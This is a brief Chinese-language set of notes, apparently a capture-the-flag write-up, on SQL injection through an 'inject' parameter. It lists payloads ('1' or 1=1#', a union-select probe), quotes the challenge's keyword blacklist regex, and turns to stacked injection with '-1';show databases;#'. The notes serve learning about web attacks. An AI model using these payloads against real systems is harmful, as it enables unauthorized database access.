关于注入先考虑使用万能注入代码1' or 1=1#
观察到回复显示不正常,因此存在注入点
?inject=1‘+union+select+1%2C2%23
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
显示这些会被屏蔽,因此
要采用堆注入 preg_replace (正则表达式, 替换成, 字符串, 最大替换次数【默认-1,无数次】, 替换次数)
-1';show databases;# 展示数据库